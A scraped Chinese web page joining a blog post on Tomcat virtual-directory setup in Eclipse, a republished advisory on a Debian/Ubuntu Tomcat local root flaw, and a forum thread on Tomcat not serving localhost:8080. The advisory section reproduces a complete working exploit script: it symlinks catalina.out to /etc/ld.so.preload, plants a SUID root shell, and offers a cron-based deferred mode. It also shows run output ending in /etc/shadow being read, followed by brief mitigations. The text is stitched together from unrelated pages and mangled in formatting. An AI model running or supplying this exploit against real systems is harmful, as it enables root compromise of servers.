7103人阅读
java（71）
服务器（15）
首先，我们要知道虚拟目录的好处。虚拟目录不同于原始的Tomcat运行方式，原始的方式是把项目拷贝到webapps下，然后启动tomcat，就可以访问webapps下的项目。我们使用eclipse配置tomcat，实际上的原理也是这种方式。
但这种方式的弊端在于，webapps下的项目不是最新的动态，一旦我们修改了eclipse工作目录下的项目，并不能立刻的反应到tomcat/webapps下。所以我们不得不编译项目后，清除webapps下的缓存，甚至要移除项目，然后在放进去。这样来回折腾，大大降低了工作效率。我们只要改动一个小地方，就要重复的进行一次上面的工作。
聪明的人，总是懒惰的。我们想到能不能改变一下当前的方式，有一种更好的方式呢？这时候，虚拟目录就浮现出来。
虚拟目录的作用是把Web的发布目录直接定位到eclipse工作目录下，实现实时更新，实时使用。
要配置虚拟目录，我们需要在Tomcat/conf/catalina/localhost下根据项目命名“项目名.xml”，里面的内容：
&?xml version=&1.0& encoding=&UTF-8&?&
&Context path=&/cecb2b& docBase=&E:\workspace\cecb2b\webContent& workDir=&E:\workspace\cecb2b\word& reloadable=&true& debug=&1&&&/Context&
属性解释：
　　path:网络访问名
　　docBase:项目实际路径
　　wordDir:指定jsp转换为java的存放目录。这样配置，免得移植的时候重新编译jsp
　　reloadable:指定当class文件变化的时候，是否重新加载
　　debug:是否是调试模式
这样，Web发布目录就直接指向了eclipse工作目录下的项目。我们在eclipse下修改代码，只要一构建，tomcat自动重新加载。我们就不用来回移除项目了。
最后，我们还可以修改cong/web.xml中的：
&init-param&
&param-name&listings&/param-name&
&param-value&false&/param-value&
&/init-param&
把false改为true。
&最后，我们需要注意的是，用eclipse创建Web项目，一定要是动态Web项目，然后在修改项目的一些属性：
1、去掉Project--Build Automatically（自动构建）
2、属性--Builders--除了Java Builder全部勾去（这样项目构建速度大大加快）。
3、属性--Java Build Path--Source--项目名/WebContent/WEB-INF/classes
&注意，tomcat7.0和以往不同：
&Context path=&/vsearch& docBase=&E:/workspace/vsearch2012/WebContent& reloadable=&true& debug=&5& crossContext=&true& /&&
需要注意，xml文件名必须和path的名相同！
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：1355390次
积分：9985
积分：9985
排名：第1368名
原创：27篇
转载：357篇
评论：109条
(1)(3)(2)(3)(4)(2)(3)(1)(1)(8)(1)(1)(3)(1)(3)(11)(5)(5)(7)(1)(5)(3)(8)(9)(7)(2)(7)(7)(10)(7)(11)(6)(1)(4)(11)(7)(29)(2)(5)(8)(2)(6)(9)(16)(6)(12)(1)(3)(12)(11)(17)(22)(18)(25)(11)(1)Tomcat 本地提权漏洞预警
Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器，按照Sun Microsystems提供的技术规范，实现了对Servlet和JavaServer Page（JSP）的支持，并提供了作为Web服务器的一些特有功能，如Tomcat管理和控制平台、安全域管理和Tomcat阀等。10月1日,Tomcat爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的Tomcat用户获得系统的root权限。漏洞相关信息：CVE ID:CVE-影响范围：Tomcat 8 &= 8.0.36-2Tomcat 7 &= 7.0.70-2Tomcat 6 &= 6.0.45+dfsg-1~deb8u1受影响的系统包括Debian、Ubuntu，其他使用相应deb包的系统也可能受到影响。漏洞描述：Debian系统的linux上管理员通常利用apt-get进行包管理，CVE-这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本：/etc/init.d/tocat* 利用该脚本，可导致攻击者通过低权限的Tomcat用户获得系统root权限！# Run the catalina.sh script as a daemonset +etouch &$CATALINA_PID& &$CATALINA_BASE&/logs/catalina.outchown $TOMCAT7_USER &$CATALINA_PID& &$CATALINA_BASE&/logs/catalina.out本地攻击者，作为tomcat用户（比如说，通过web应用的漏洞）若将catalina.out修改为指向任意系统文件的链接，一旦Tomcat init脚本（ROOT权限运行）在服务重启后再次打开catalina.out文件，攻击者就可获取ROOT权限。漏洞PoC： #!/bin/bash## Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit## CVE-## Discovered and coded by:## Dawid Golunski# ## This exploit targets Tomcat (versions 6, 7 and 8) packaging on&# Debian-based distros including Debian, Ubuntu etc.# It allows attackers with a tomcat shell (e.g. obtained remotely through a&# vulnerable java webapp, or locally via weak permissions on webapps in the&# Tomcat webroot directories etc.) to escalate their privileges to root.## Usage:# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]## The exploit can used in two ways:## -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.&# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)## -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to&# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.&# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a&# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can# then add arbitrary commands to the file which will be executed with root privileges by&# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default&# Ubuntu/Debian Tomcat installations).## See full advisory for details at:# /advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-.html## Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH=&/bin/bash&BACKDOORPATH=&/tmp/tomcatrootsh&PRIVESCLIB=&/tmp/privesclib.so&PRIVESCSRC=&/tmp/privesclib.c&SUIDBIN=&/usr/bin/sudo&function cleanexit {# Cleanup&echo -e &\n[+] Cleaning up...&rm -f $PRIVESCSRCrm -f $PRIVESCLIBrm -f $TOMCATLOGtouch $TOMCATLOGif [ -f /etc/ld.so.preload ]; thenecho -n & /etc/ld.so.preload 2&/dev/nullfiecho -e &\n[+] Job done. Exiting with code $1 \n&exit $1}function ctrl_c() {echo -e &\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.&cleanexit 0}#intro&echo -e &\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-\n&echo -e &Discovered and coded by: \n\nDawid Golunski \n \033[0m&# Argsif [ $# -lt 1 ]; thenecho -e &\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n&exit 3fiif [ &$2& = &-deferred& ]; thenmode=&deferred&elsemode=&active&fi# Priv checkecho -e &\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`&id | grep -q tomcatif [ $? -ne 0 ]; thenecho -e &\n[!] You need to execute the exploit as tomcat user! Exiting.\n&exit 3fi# Set target pathsTOMCATLOG=&$1&if [ ! -f $TOMCATLOG ]; thenecho -e &\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n&exit 3fiecho -e &\n[+] Target Tomcat log file set to $TOMCATLOG&# [ Deferred exploitation ]# Symlink the log file to /etc/default/locale file which gets executed daily on default# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been# restarted and file owner gets changed.if [ &$mode& = &deferred& ]; thenrm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOGif [ $? -ne 0 ]; thenecho -e &\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.&cleanexit 3fiecho -e&\n[+] Symlink created at: \n`ls -l $TOMCATLOG`&echo -e&\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`&echo -ne &\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot&echo -ne &\n you'll be able to add arbitrary commands to the file which will get executed with root privileges&echo -ne &\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can')\n\n&exit 0fi# [ Active exploitation ]trap ctrl_c INT# Compile privesc preload libraryecho -e &\n[+] Compiling the privesc shared library ($PRIVESCSRC)&cat &&_solibeof_&$PRIVESCSRC#define _GNU_SOURCE#include &stdio.h&#include &sys/stat.h&#include &unistd.h&#include &dlfcn.h&uid_t geteuid(void) {static uid_t(*old_geteuid)();old_geteuid = dlsym(RTLD_NEXT, &geteuid&);if ( old_geteuid() == 0 ) {chown(&$BACKDOORPATH&, 0, 0);chmod(&$BACKDOORPATH&, 04777);unlink(&/etc/ld.so.preload&);}return old_geteuid();}_solibeof_gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldlif [ $? -ne 0 ]; thenecho -e &\n[!] Failed to compile the privesc lib $PRIVESCSRC.&cleanexit 2;fi# Prepare backdoor shellcp $BACKDOORSH $BACKDOORPATHecho -e &\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`&# Safety checkif [ -f /etc/ld.so.preload ]; thenecho -e &\n[!] /etc/ld.so.preload already exists. Exiting for safety.&cleanexit 2fi# Symlink the log file to ld.so.preloadrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOGif [ $? -ne 0 ]; thenecho -e &\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.&cleanexit 3fiecho -e &\n[+] Symlink created at: \n`ls -l $TOMCATLOG`&# Wait for Tomcat to re-open the logsecho -ne &\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...&echo -e&\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user))&while :; do&sleep 0.1if [ -f /etc/ld.so.preload ]; thenecho $PRIVESCLIB & /etc/ld.so.preloadfidone# /etc/ld.so.preload file should be owned by tomcat user at this point# Inject the privesc.so shared library to escalate privilegesecho $PRIVESCLIB & /etc/ld.so.preloadecho -e &\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`&echo -e &\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload&echo -e &\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`&# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo -e &\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!&sudo --help 2&/dev/null &/dev/null# Check for the rootshellls -l $BACKDOORPATH | grep rws | grep -q rootif [ $? -eq 0 ]; then&echo -e &\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`&echo -e &\n\033[94mPlease tell me you')\033[0m&elseecho -e &\n[!] Failed to get root&cleanexit 2fi# Execute the rootshellecho -e &\n[+] Executing the rootshell $BACKDOORPATH now! \n&$BACKDOORPATH -p -c &rm -f /etc/ld.so. rm -f $PRIVESCLIB&$BACKDOORPATH -p# Job done.cleanexit 0 Poc运行示例： tomcat7@ubuntu:/tmp$ iduid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)tomcat7@ubuntu:/tmp$ lsb_release -aNo LSB modules are available.Distributor ID: UbuntuDescription: Ubuntu 16.04 LTSRelease: 16.04Codename: xenialtomcat7@ubuntu:/tmp$ dpkg -l | grep tomcatiilibtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core librariesiitomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engineiitomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common filestomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out&Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation ExploitCVE-Discovered and coded by:&Dawid Golunski&[+] Starting the exploit in [active] mode with the following privileges:&uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out[+] Compiling the privesc shared library (/tmp/privesclib.c)[+] Backdoor/low-priv shell installed at:&-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh[+] Symlink created at:&lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -& /etc/ld.so.preload[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...You could speed things up by executing : kill [Tomcat-pid] (as tomcat user))[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:&-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload[+] The /etc/ld.so.preload file now contains:&/tmp/privesclib.so[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root![+] Rootshell got assigned root SUID perms at:&-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootshPlease tell me you')[+] Executing the rootshell /tmp/tomcatrootsh now!&tomcatrootsh-4.3# iduid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)tomcatrootsh-4.3# whoamiroottomcatrootsh-4.3# head -n3 /etc/shadowroot:$6$oaf[cut]:99:7:::daemon:*:99:7:::bin:*:99:7:::tomcatrootsh-4.3# exit应急修复方案：1.临时修复建议如对更新包风险的考虑,可先更改Tomcat的启动脚本为 chown -h $TOMCAT6_USER &$CATALINA_PID& &$CATALINA_BASE&/logs/catalina.out加入 - h参数防止其他文件所有者被更改。2. 更新最新Tomcat包更新至系统提供的最新版Tomcat包即可。稿源：
Tomcat 的详细介绍：
Tomcat 的下载地址：
转载请注明：文章转载自 开源中国社区
本文标题：Tomcat 本地提权漏洞预警
本文地址：
这跟java有毛关系？你没看到是linux软连接？
这个不怪tomcat或者java，怪debian的打包为什么eclipse中tomcat能正常启动，但是浏览器访问不了tomcat首页
eclipse中的tomcat启动没有报任何错误，启动过程如下：
12:07:39 org.apache.catalina.core.AprLifecycleListener init 信息: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: C:\Program Files\Java\jdk1.6.0_02\.;C:\Windows\Sun\Java\C:\Windows\system32;C:\WC:/Program Files/Java/jre6/bin/C:/Program Files/Java/jre6/C:/Program Files/Java/jre6/lib/i386;D:\Python27\;D:\Python27\SC:\Windows\system32;C:\WC:\Windows\System32\WC:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\100\Tools\Binn\;C:\Program Files\Microsoft SQL Server\100\DTS\Binn\;C:\Program Files\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\;D:\MatLab\bin\win32;C:\Windows\Microsoft.NET\Framework\v4.0.30319;C:\Program Files\Java\jdk1.6.0_02\D:\Program Files\TortoiseSVN\D:\Program Files\MySQL\MySQL Server 5.5\C:\Program Files\Java\jdk1.6.0_02\F:\maven\apache-maven-3.0.4-bin\apache-maven-3.0.4\C:\Program Files\Java\jdk1.6.0_02\D:\Program Files\elipse企业版\eclipse-jee\
12:07:41 org.apache.coyote.AbstractProtocol init 信息: Initializing ProtocolHandler [&http-bio-8080&]
12:07:42 org.apache.coyote.AbstractProtocol init 信息: Initializing ProtocolHandler [&ajp-bio-8009&]
12:07:42 org.apache.catalina.startup.Catalina load 信息: Initialization processed in 4391 ms
12:07:42 org.apache.catalina.core.StandardService startInternal 信息: Starting service Catalina
12:07:42 org.apache.catalina.core.StandardEngine startInternal 信息: Starting Servlet Engine: Apache Tomcat/7.0.29
12:07:43 org.apache.catalina.util.SessionIdGenerator createSecureRandom 信息: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [488] milliseconds.
12:07:43 org.apache.coyote.AbstractProtocol start 信息: Starting ProtocolHandler [&http-bio-8080&]
12:07:43 org.apache.coyote.AbstractProtocol start 信息: Starting ProtocolHandler [&ajp-bio-8009&]
12:07:43 org.apache.catalina.startup.Catalina start 信息: Server startup in 1659 ms
但是访问localhost:8080访问不了，不知道什么原因，期待高人回答。。
你确定是8080端口？
--- 共有 1 条评论 ---
你看看在tomcat中有没有webapps/ROOT文件夹
tomcat默认&/&指向的是ROOT应用
你没有改端口？或其他操作
引用来自“jeffsui”的答案你确定是8080端口？是8080的。
信息: Initializing ProtocolHandler [&http-bio-8080&]
引用来自“xwz”的答案 你看看在tomcat中有没有webapps/ROOT文件夹
tomcat默认&/&指向的是ROOT应用 正解。很可能由于误操作删了这个文件夹。
--- 共有 1 条评论 ---
恩，我之前碰到到这情况，不过我tomcat是重新下载的，然后在eclipse中新建的。
谢谢大家，问题已经解决了。。问题出在我没有在eclipse中tomcat的server location设置到tomcat的安装目录
确实是这问题，感谢楼主}